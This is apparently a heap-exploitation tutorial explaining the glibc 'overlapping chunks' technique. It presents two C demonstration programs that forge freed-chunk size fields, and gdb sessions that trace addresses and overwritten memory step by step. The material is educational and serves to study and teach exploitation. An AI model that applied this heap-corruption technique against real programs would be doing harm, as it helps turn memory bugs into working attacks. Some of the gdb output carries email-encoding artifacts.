This code is from the "Overlapping chunks flow (Top chunk)" example described earlier. Note that the gdb session below shows the freed 0x110-byte chunk going straight into main_arena.bins[0] (the unsorted bin), i.e. a glibc without tcache (the page does not name the version). On glibc 2.26 and later a freed chunk of this size is cached in tcache first, and from 2.29 malloc() additionally rejects an unsorted chunk whose size does not match the next chunk's prev_size field, so the exact steps shown here would need adjusting on current distributions.
The code calls malloc() three times: two allocations of 0x100 bytes (buf1, buf2) followed by one of 0x80 bytes (buf3). With the 8-byte size header and 16-byte rounding these become chunks of 0x110, 0x110 and 0x90 bytes.
memset() fills the memory pointed to by buf2 with the letter 'B' and the memory pointed to by buf3 with the letter 'C'.
Then the second allocation (buf2) is freed; its 0x110-byte chunk is too large for the fastbins and is placed in the unsorted bin (main_arena.bins[0] in the session below).
Next the size field of the freed chunk, `*(buf2 - 1)`, is overwritten with 417 (0x1a1, i.e. a chunk size of 0x1a0 with the PREV_INUSE bit set). This write-after-free stands in for the memory-corruption primitive an attacker would need in a real target. 0x1a0 is chosen so that the forged chunk ends exactly where the top chunk begins (0x602110 + 0x1a0 = 0x6022b0 in the session below), which means it completely covers buf3's chunk (0x602220 ~ 0x6022b0).
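#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <stdint.h>
#include <unistd.h>

/* Request sizes used by the demo. With the 8-byte size header and 16-byte
 * rounding the resulting chunks are 0x110, 0x110 and 0x90 bytes. */
#define BUF1_SIZE 0x100
#define BUF2_SIZE 0x100
#define BUF3_SIZE 0x80
/* Forged size field: chunk size 0x1a0 with the PREV_INUSE bit (bit 0) set. */
#define FORGED_SIZE 417 /* 0x1a1 */
/* 408 + 8-byte header = 416 = 0x1a0: an exact-size request for the forged chunk. */
#define BUF4_SIZE 408

/*
 * Overlapping-chunks demo.
 *
 * buf2 is freed, then its size field is rewritten so that the next malloc()
 * of a matching size hands out a chunk that extends over buf3. Writing to
 * that new allocation (buf4) therefore clobbers buf3.
 *
 * The store to *(buf2 - 1) writes into memory that has already been freed;
 * it stands in for the heap-overflow / use-after-free primitive an attacker
 * would need in a real target. Everything else is ordinary, defined C.
 *
 * Returns 0 on success, 1 if an allocation fails.
 */
int main(void)
{
    /* buf1 is never written; it only sits in front of buf2 in the heap. */
    unsigned long *buf1 = malloc(BUF1_SIZE);
    unsigned long *buf2 = malloc(BUF2_SIZE);
    unsigned long *buf3 = malloc(BUF3_SIZE);

    /* A NULL here would turn the demo into a plain NULL dereference. */
    if (buf1 == NULL || buf2 == NULL || buf3 == NULL) {
        fputs("malloc failed\n", stderr);
        return 1;
    }

    memset(buf2, 'B', BUF2_SIZE);
    memset(buf3, 'C', BUF3_SIZE);

    /* A 0x110-byte chunk is too large for the fastbins on the glibc used in
     * the write-up, so it lands in the unsorted bin (main_arena.bins[0]). */
    free(buf2);

    /* Simulated corruption: the freed chunk's size field (the 8 bytes just
     * before the user pointer) now claims 0x1a0 bytes. In the recorded
     * session 0x602110 + 0x1a0 = 0x6022b0 is where the top chunk starts, so
     * the forged chunk swallows buf3's chunk (0x602220 ~ 0x6022b0). */
    *(buf2 - 1) = FORGED_SIZE;

    /* Exact-size request for the forged chunk: returns buf2's old address. */
    char *buf4 = malloc(BUF4_SIZE);
    if (buf4 == NULL) {
        fputs("malloc failed\n", stderr);
        return 1;
    }

    /* Filling buf4 overwrites buf3, which lives inside the forged chunk. */
    memset(buf4, 'A', BUF4_SIZE);

    /* buf3 is not NUL-terminated: bound the print to its own 0x80 bytes
     * instead of letting %s run until it happens to hit a zero byte. */
    fprintf(stderr, "buf3 : %.*s\n", (int)BUF3_SIZE, (char *)buf3);
    return 0;
}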
lazenca= 0x0@ubuntu:~/Book$ gcc -o overlapping_chunks overlapping_chunks.c=20 lazenca0x0@ubuntu:~/Book$ gdb -q ./overlapping_chunks Reading symbols from ./overlapping_chunks...(no debugging symbols found)...= done. gdb-peda$ disassemble main Dump of assembler code for function main: 0x0000000000400646 <+0>:=09push rbp 0x0000000000400647 <+1>:=09mov rbp,rsp 0x000000000040064a <+4>:=09sub rsp,0x20 0x000000000040064e <+8>:=09mov edi,0x100 0x0000000000400653 <+13>:=09call 0x400530 <malloc@plt> 0x0000000000400658 <+18>:=09mov QWORD PTR [rbp-0x20],rax 0x000000000040065c <+22>:=09mov edi,0x100 0x0000000000400661 <+27>:=09call 0x400530 <malloc@plt> 0x0000000000400666 <+32>:=09mov QWORD PTR [rbp-0x18],rax 0x000000000040066a <+36>:=09mov edi,0x80 0x000000000040066f <+41>:=09call 0x400530 <malloc@plt> 0x0000000000400674 <+46>:=09mov QWORD PTR [rbp-0x10],rax 0x0000000000400678 <+50>:=09mov rax,QWORD PTR [rbp-0x18] 0x000000000040067c <+54>:=09mov edx,0x100 0x0000000000400681 <+59>:=09mov esi,0x42 0x0000000000400686 <+64>:=09mov rdi,rax 0x0000000000400689 <+67>:=09call 0x400500 <memset@plt> 0x000000000040068e <+72>:=09mov rax,QWORD PTR [rbp-0x10] 0x0000000000400692 <+76>:=09mov edx,0x80 0x0000000000400697 <+81>:=09mov esi,0x43 0x000000000040069c <+86>:=09mov rdi,rax 0x000000000040069f <+89>:=09call 0x400500 <memset@plt> 0x00000000004006a4 <+94>:=09mov rax,QWORD PTR [rbp-0x18] 0x00000000004006a8 <+98>:=09mov rdi,rax 0x00000000004006ab <+101>:=09call 0x4004f0 <free@plt> 0x00000000004006b0 <+106>:=09mov rax,QWORD PTR [rbp-0x18] 0x00000000004006b4 <+110>:=09sub rax,0x8 0x00000000004006b8 <+114>:=09mov QWORD PTR [rax],0x1a1 0x00000000004006bf <+121>:=09mov edi,0x198 0x00000000004006c4 <+126>:=09call 0x400530 <malloc@plt> 0x00000000004006c9 <+131>:=09mov QWORD PTR [rbp-0x8],rax 0x00000000004006cd <+135>:=09mov rax,QWORD PTR [rbp-0x8] 0x00000000004006d1 <+139>:=09mov edx,0x198 0x00000000004006d6 <+144>:=09mov esi,0x41 0x00000000004006db <+149>:=09mov rdi,rax 0x00000000004006de 
<+152>:=09call 0x400500 <memset@plt> 0x00000000004006e3 <+157>:=09mov rax,QWORD PTR [rip+0x200976] = # 0x601060 <stderr@@GLIBC_2.2.5> 0x00000000004006ea <+164>:=09mov rdx,QWORD PTR [rbp-0x10] 0x00000000004006ee <+168>:=09mov esi,0x400794 0x00000000004006f3 <+173>:=09mov rdi,rax 0x00000000004006f6 <+176>:=09mov eax,0x0 0x00000000004006fb <+181>:=09call 0x400520 <fprintf@plt> 0x0000000000400700 <+186>:=09nop 0x0000000000400701 <+187>:=09leave =20 0x0000000000400702 <+188>:=09ret =20 End of assembler dump. gdb-peda$ b *0x0000000000400658 Breakpoint 1 at 0x400658 gdb-peda$ b *0x0000000000400666 Breakpoint 2 at 0x400666 gdb-peda$ b *0x0000000000400674 Breakpoint 3 at 0x400674 gdb-peda$ b *0x000000000040068e Breakpoint 4 at 0x40068e gdb-peda$ b *0x00000000004006a4 Breakpoint 5 at 0x4006a4 gdb-peda$ b *0x00000000004006b0 Breakpoint 6 at 0x4006b0 gdb-peda$ b *0x00000000004006b8 Breakpoint 7 at 0x4006b8 gdb-peda$ b *0x00000000004006c9 Breakpoint 8 at 0x4006c9 gdb-peda$ b *0x00000000004006e3 Breakpoint 9 at 0x4006e3 gdb-peda$
gdb-peda$ r
Starting program: /home/lazenca0x0/Book/overlapping_chunks
Breakpoint 1, 0x0000000000400658 in main ()
gdb-peda$ i r rax
rax            0x602010    0x602010
gdb-peda$ c
Continuing.
Breakpoint 2, 0x0000000000400666 in main ()
gdb-peda$ i r rax
rax            0x602120    0x602120
gdb-peda$ c
Continuing.
Breakpoint 3, 0x0000000000400674 in main ()
gdb-peda$ i r rax
rax            0x602230    0x602230
gdb-peda$
gdb-ped= a$ c Continuing. Breakpoint 4, 0x000000000040068e in main () gdb-peda$ x/40gx 0x602120 0x602120:=090x4242424242424242=090x4242424242424242 0x602130:=090x4242424242424242=090x4242424242424242 0x602140:=090x4242424242424242=090x4242424242424242 0x602150:=090x4242424242424242=090x4242424242424242 0x602160:=090x4242424242424242=090x4242424242424242 0x602170:=090x4242424242424242=090x4242424242424242 0x602180:=090x4242424242424242=090x4242424242424242 0x602190:=090x4242424242424242=090x4242424242424242 0x6021a0:=090x4242424242424242=090x4242424242424242 0x6021b0:=090x4242424242424242=090x4242424242424242 0x6021c0:=090x4242424242424242=090x4242424242424242 0x6021d0:=090x4242424242424242=090x4242424242424242 0x6021e0:=090x4242424242424242=090x4242424242424242 0x6021f0:=090x4242424242424242=090x4242424242424242 0x602200:=090x4242424242424242=090x4242424242424242 0x602210:=090x4242424242424242=090x4242424242424242 0x602220:=090x0000000000000000=090x0000000000000091 0x602230:=090x0000000000000000=090x0000000000000000 0x602240:=090x0000000000000000=090x0000000000000000 0x602250:=090x0000000000000000=090x0000000000000000 gdb-peda$ c Continuing. Breakpoint 5, 0x00000000004006a4 in main () gdb-peda$ x/20gx 0x602230 0x602230:=090x4343434343434343=090x4343434343434343 0x602240:=090x4343434343434343=090x4343434343434343 0x602250:=090x4343434343434343=090x4343434343434343 0x602260:=090x4343434343434343=090x4343434343434343 0x602270:=090x4343434343434343=090x4343434343434343 0x602280:=090x4343434343434343=090x4343434343434343 0x602290:=090x4343434343434343=090x4343434343434343 0x6022a0:=090x4343434343434343=090x4343434343434343 0x6022b0:=090x0000000000000000=090x0000000000020d51 0x6022c0:=090x0000000000000000=090x0000000000000000 gdb-peda$
gdb-peda$ c
Continuing.
Breakpoint 6, 0x00000000004006b0 in main ()
gdb-peda$ p main_arena.bins[0]
$1 = (mchunkptr) 0x602110
gdb-peda$ p main_arena.bins[1]
$2 = (mchunkptr) 0x602110
gdb-peda$ c
Continuing.
Breakpoint 7, 0x00000000004006b8 in main ()
gdb-peda$ x/i $rip
=> 0x4006b8 <main+114>:    mov    QWORD PTR [rax],0x1a1
gdb-peda$ i r rax
rax            0x602118    0x602118
gdb-peda$ x/gx 0x602118
0x602118:    0x0000000000000111
gdb-peda$ ni
0x00000000004006bf in main ()
gdb-peda$ x/gx 0x602118
0x602118:    0x00000000000001a1
gdb-peda$ p main_arena.bins[0].size
$3 = 0x1a1
gdb-peda$
When malloc() is then asked for 408 bytes (416 = 0x1a0 after adding the header and rounding), the allocator hands back the freed second chunk whose size field was just changed, because the forged size matches the request exactly.
The chunk is now 0x1a0 bytes (0x1a1 with the PREV_INUSE bit cleared) and spans 0x602110 ~ 0x6022b0; its user region 0x602120 ~ 0x6022b0 completely contains buf3's chunk (0x602220 ~ 0x6022b0), so the memset() of buf4 overwrites buf3.
gdb-peda$ c
Continuing.
Breakpoint 8, 0x00000000004006c9 in main ()
gdb-peda$ i r rax
rax            0x602120    0x602120
gdb-peda$ x/2gx 0x602120 - 0x10
0x602110:    0x0000000000000000    0x00000000000001a1
gdb-peda$ p/x 0x602110 + 0x1a0
$4 = 0x6022b0
gdb-peda$
gdb-ped= a$ c Continuing. Breakpoint 9, 0x00000000004006e3 in main () gdb-peda$ x/60gx 0x602120 0x602120:=090x4141414141414141=090x4141414141414141 0x602130:=090x4141414141414141=090x4141414141414141 0x602140:=090x4141414141414141=090x4141414141414141 0x602150:=090x4141414141414141=090x4141414141414141 0x602160:=090x4141414141414141=090x4141414141414141 0x602170:=090x4141414141414141=090x4141414141414141 0x602180:=090x4141414141414141=090x4141414141414141 0x602190:=090x4141414141414141=090x4141414141414141 0x6021a0:=090x4141414141414141=090x4141414141414141 0x6021b0:=090x4141414141414141=090x4141414141414141 0x6021c0:=090x4141414141414141=090x4141414141414141 0x6021d0:=090x4141414141414141=090x4141414141414141 0x6021e0:=090x4141414141414141=090x4141414141414141 0x6021f0:=090x4141414141414141=090x4141414141414141 0x602200:=090x4141414141414141=090x4141414141414141 0x602210:=090x4141414141414141=090x4141414141414141 0x602220:=090x4141414141414141=090x4141414141414141 0x602230:=090x4141414141414141=090x4141414141414141 0x602240:=090x4141414141414141=090x4141414141414141 0x602250:=090x4141414141414141=090x4141414141414141 0x602260:=090x4141414141414141=090x4141414141414141 0x602270:=090x4141414141414141=090x4141414141414141 0x602280:=090x4141414141414141=090x4141414141414141 0x602290:=090x4141414141414141=090x4141414141414141 0x6022a0:=090x4141414141414141=090x4141414141414141 0x6022b0:=090x0000000000000000=090x0000000000020d51 0x6022c0:=090x0000000000000000=090x0000000000000000 0x6022d0:=090x0000000000000000=090x0000000000000000 0x6022e0:=090x0000000000000000=090x0000000000000000 0x6022f0:=090x0000000000000000=090x0000000000000000 gdb-peda$ c Continuing. buf3 : AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA= AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA [Inferior 1 (process 2790) exited with code 0210] Warning: not running gdb-peda$
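#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <malloc.h>
#include <unistd.h>

/* 112 + 8-byte header = 120 -> rounded to a 0x80-byte chunk, a fastbin size. */
#define CHUNK_REQ 112
/* Forged size field: chunk size 0x100 with the PREV_INUSE bit set. */
#define FORGED_SIZE 0x101
/* 224 + 8 = 232 -> 0xf0; served from the forged 0x100-byte chunk. */
#define BUF6_REQ 224

/*
 * Overlapping-chunks demo, variant 2.
 *
 * buf2's size field is rewritten *before* it is freed, so free() files it as
 * a 0x100-byte chunk (unsorted bin rather than a fastbin). The next malloc()
 * that fits is served from that chunk, which now covers buf3 as well.
 *
 * buf4 is freed first so that the forged chunk's "next chunk" (buf2's chunk
 * header + 0x100) is a freed fastbin chunk whose size field still reads 0x81
 * (PREV_INUSE set), which keeps free(buf2) from trying to merge with it.
 * buf1 and buf5 are never written; they only shape the heap layout.
 *
 * The store to *(buf2 - 1) is the simulated attacker primitive (an overflow
 * into chunk metadata); everything else is ordinary, defined C.
 *
 * Returns 0 on success, 1 if an allocation fails.
 */
int main(void)
{
    unsigned long *buf1 = malloc(CHUNK_REQ);
    unsigned long *buf2 = malloc(CHUNK_REQ);
    unsigned long *buf3 = malloc(CHUNK_REQ);
    unsigned long *buf4 = malloc(CHUNK_REQ);
    unsigned long *buf5 = malloc(CHUNK_REQ);

    /* A NULL here would turn the demo into a plain NULL dereference. */
    if (buf1 == NULL || buf2 == NULL || buf3 == NULL || buf4 == NULL || buf5 == NULL) {
        fputs("malloc failed\n", stderr);
        return 1;
    }

    /* 0x80-byte chunk -> fastbinsY[6]; its size field keeps PREV_INUSE set. */
    free(buf4);

    /* Simulated corruption: buf2's size field goes from 0x81 to 0x101, so the
     * chunk now claims to end right at buf4's (freed) chunk header. */
    *(buf2 - 1) = FORGED_SIZE;

    /* Treated as a 0x100-byte chunk: not a fastbin size, so it goes to the
     * unsorted bin (main_arena.bins[0]). */
    free(buf2);

    /* Served from the forged chunk: returns buf2's old address. The chunk is
     * handed out whole since the 0x10 left over is below the minimum chunk
     * size, and it overlaps buf3 entirely. */
    char *buf6 = malloc(BUF6_REQ);
    if (buf6 == NULL) {
        fputs("malloc failed\n", stderr);
        return 1;
    }

    /* Filling buf6 overwrites buf3, which lives inside the forged chunk. */
    memset(buf6, 'C', BUF6_REQ);

    /* buf3 is not NUL-terminated: bound the print to the bytes that were
     * requested for it instead of letting %s run past the allocation. */
    fprintf(stderr, "buf3 : %.*s\n", (int)CHUNK_REQ, (char *)buf3);
    return 0;
}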
lazenca= 0x0@ubuntu:~/Book$ gcc -o overlapping_chunks2 overlapping_chunks2.c=20 lazenca0x0@ubuntu:~/Book$ gdb -q ./overlapping_chunks2 Reading symbols from ./overlapping_chunks2...(no debugging symbols found)..= .done. gdb-peda$ disassemble main Dump of assembler code for function main: 0x0000000000400646 <+0>:=09push rbp 0x0000000000400647 <+1>:=09mov rbp,rsp 0x000000000040064a <+4>:=09sub rsp,0x30 0x000000000040064e <+8>:=09mov edi,0x70 0x0000000000400653 <+13>:=09call 0x400530 <malloc@plt> 0x0000000000400658 <+18>:=09mov QWORD PTR [rbp-0x30],rax 0x000000000040065c <+22>:=09mov edi,0x70 0x0000000000400661 <+27>:=09call 0x400530 <malloc@plt> 0x0000000000400666 <+32>:=09mov QWORD PTR [rbp-0x28],rax 0x000000000040066a <+36>:=09mov edi,0x70 0x000000000040066f <+41>:=09call 0x400530 <malloc@plt> 0x0000000000400674 <+46>:=09mov QWORD PTR [rbp-0x20],rax 0x0000000000400678 <+50>:=09mov edi,0x70 0x000000000040067d <+55>:=09call 0x400530 <malloc@plt> 0x0000000000400682 <+60>:=09mov QWORD PTR [rbp-0x18],rax 0x0000000000400686 <+64>:=09mov edi,0x70 0x000000000040068b <+69>:=09call 0x400530 <malloc@plt> 0x0000000000400690 <+74>:=09mov QWORD PTR [rbp-0x10],rax 0x0000000000400694 <+78>:=09mov rax,QWORD PTR [rbp-0x18] 0x0000000000400698 <+82>:=09mov rdi,rax 0x000000000040069b <+85>:=09call 0x4004f0 <free@plt> 0x00000000004006a0 <+90>:=09mov rax,QWORD PTR [rbp-0x28] 0x00000000004006a4 <+94>:=09sub rax,0x8 0x00000000004006a8 <+98>:=09mov QWORD PTR [rax],0x101 0x00000000004006af <+105>:=09mov rax,QWORD PTR [rbp-0x28] 0x00000000004006b3 <+109>:=09mov rdi,rax 0x00000000004006b6 <+112>:=09call 0x4004f0 <free@plt> 0x00000000004006bb <+117>:=09mov edi,0xe0 0x00000000004006c0 <+122>:=09call 0x400530 <malloc@plt> 0x00000000004006c5 <+127>:=09mov QWORD PTR [rbp-0x8],rax 0x00000000004006c9 <+131>:=09mov rax,QWORD PTR [rbp-0x8] 0x00000000004006cd <+135>:=09mov edx,0xe0 0x00000000004006d2 <+140>:=09mov esi,0x43 0x00000000004006d7 <+145>:=09mov rdi,rax 0x00000000004006da <+148>:=09call 
0x400500 <memset@plt> 0x00000000004006df <+153>:=09mov rax,QWORD PTR [rip+0x20097a] = # 0x601060 <stderr@@GLIBC_2.2.5> 0x00000000004006e6 <+160>:=09mov rdx,QWORD PTR [rbp-0x20] 0x00000000004006ea <+164>:=09mov esi,0x400794 0x00000000004006ef <+169>:=09mov rdi,rax 0x00000000004006f2 <+172>:=09mov eax,0x0 0x00000000004006f7 <+177>:=09call 0x400520 <fprintf@plt> 0x00000000004006fc <+182>:=09mov eax,0x0 0x0000000000400701 <+187>:=09leave =20 0x0000000000400702 <+188>:=09ret =20 End of assembler dump. gdb-peda$ b *0x0000000000400658 Breakpoint 1 at 0x400658 gdb-peda$ b *0x0000000000400666 Breakpoint 2 at 0x400666 gdb-peda$ b *0x0000000000400674 Breakpoint 3 at 0x400674 gdb-peda$ b *0x0000000000400682 Breakpoint 4 at 0x400682 gdb-peda$ b *0x0000000000400690 Breakpoint 5 at 0x400690 gdb-peda$ b *0x00000000004006a0 Breakpoint 6 at 0x4006a0 gdb-peda$ b *0x00000000004006a8 Breakpoint 7 at 0x4006a8 gdb-peda$ b *0x00000000004006bb Breakpoint 8 at 0x4006bb gdb-peda$ b *0x00000000004006c5 Breakpoint 9 at 0x4006c5 gdb-peda$ b *0x00000000004006df Breakpoint 10 at 0x4006df gdb-peda$
gdb-peda$ r
Starting program: /home/lazenca0x0/Book/overlapping_chunks2
Breakpoint 1, 0x0000000000400658 in main ()
gdb-peda$ i r rax
rax            0x602010    0x602010
gdb-peda$ c
Continuing.
Breakpoint 2, 0x0000000000400666 in main ()
gdb-peda$ i r rax
rax            0x602090    0x602090
gdb-peda$ c
Continuing.
Breakpoint 3, 0x0000000000400674 in main ()
gdb-peda$ i r rax
rax            0x602110    0x602110
gdb-peda$ c
Continuing.
Breakpoint 4, 0x0000000000400682 in main ()
gdb-peda$ i r rax
rax            0x602190    0x602190
gdb-peda$ c
Continuing.
Breakpoint 5, 0x0000000000400690 in main ()
gdb-peda$ i r rax
rax            0x602210    0x602210
gdb-peda$
After the fourth allocation (buf4) is freed, its 0x80-byte chunk is placed in fastbinsY[6] (index (0x80 >> 4) - 2); a fastbin chunk keeps the PREV_INUSE bit in its size field, so the next chunk's metadata still reads 0x81.
Then the size field of the second chunk is changed from 0x81 to 0x101. When buf2 is subsequently freed, glibc treats it as a 0x100-byte chunk, which is too large for the fastbins, and puts it in the unsorted bin. The forged chunk's "next chunk" is exactly buf4's freed chunk at 0x602180 (chunk header 0x602080 + 0x100), whose size field 0x81 still looks in-use, so free() does not consolidate with it; the following malloc(224) is then served from the 0x100-byte chunk, which overlaps buf3 (0x602110 ~ 0x602170 is inside it). Note that the `p/x 0x602090 + 0x100` computation in the session below is measured from the user pointer and lands on buf4's user pointer (0x602190); the forged chunk itself spans 0x602080 ~ 0x602180.
gdb-peda$ c
Continuing.
Breakpoint 6, 0x00000000004006a0 in main ()
gdb-peda$ p main_arena.fastbinsY[6]
$3 = (mfastbinptr) 0x602180
gdb-peda$ c
Continuing.
Breakpoint 7, 0x00000000004006a8 in main ()
gdb-peda$ x/i $rip
=> 0x4006a8 <main+98>:    mov    QWORD PTR [rax],0x101
gdb-peda$ i r rax
rax            0x602088    0x602088
gdb-peda$ x/gx 0x602088
0x602088:    0x0000000000000081
gdb-peda$ ni
0x00000000004006af in main ()
gdb-peda$ x/gx 0x602088
0x602088:    0x0000000000000101
gdb-peda$
gdb-peda$ c
Continuing.
Breakpoint 8, 0x00000000004006bb in main ()
gdb-peda$ p main_arena.bins[0]
$4 = (mchunkptr) 0x602080
gdb-peda$ p main_arena.bins[1]
$5 = (mchunkptr) 0x602080
gdb-peda$ p main_arena.bins[0].size
$6 = 0x101
gdb-peda$ c
Continuing.
Breakpoint 9, 0x00000000004006c5 in main ()
gdb-peda$ i r rax
rax            0x602090    0x602090
gdb-peda$ x/2gx 0x602090 - 0x10
0x602080:    0x0000000000000000    0x0000000000000101
gdb-peda$ p/x 0x602090 + 0x100
$7 = 0x602190
gdb-peda$
gdb-ped= a$ c Continuing. Breakpoint 10, 0x00000000004006df in main () gdb-peda$ x/40gx 0x602090 0x602090:=090x4343434343434343=090x4343434343434343 0x6020a0:=090x4343434343434343=090x4343434343434343 0x6020b0:=090x4343434343434343=090x4343434343434343 0x6020c0:=090x4343434343434343=090x4343434343434343 0x6020d0:=090x4343434343434343=090x4343434343434343 0x6020e0:=090x4343434343434343=090x4343434343434343 0x6020f0:=090x4343434343434343=090x4343434343434343 0x602100:=090x4343434343434343=090x4343434343434343 0x602110:=090x4343434343434343=090x4343434343434343 0x602120:=090x4343434343434343=090x4343434343434343 0x602130:=090x4343434343434343=090x4343434343434343 0x602140:=090x4343434343434343=090x4343434343434343 0x602150:=090x4343434343434343=090x4343434343434343 0x602160:=090x4343434343434343=090x4343434343434343 0x602170:=090x0000000000000000=090x0000000000000000 0x602180:=090x0000000000000100=090x0000000000000081 0x602190:=090x0000000000000000=090x0000000000000000 0x6021a0:=090x0000000000000000=090x0000000000000000 0x6021b0:=090x0000000000000000=090x0000000000000000 0x6021c0:=090x0000000000000000=090x0000000000000000 gdb-peda$ c Continuing. buf3 : CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC= CCCCCCCCCCCCCCCCCCCCCCCCCCCC [Inferior 1 (process 3085) exited normally] Warning: not running gdb-peda$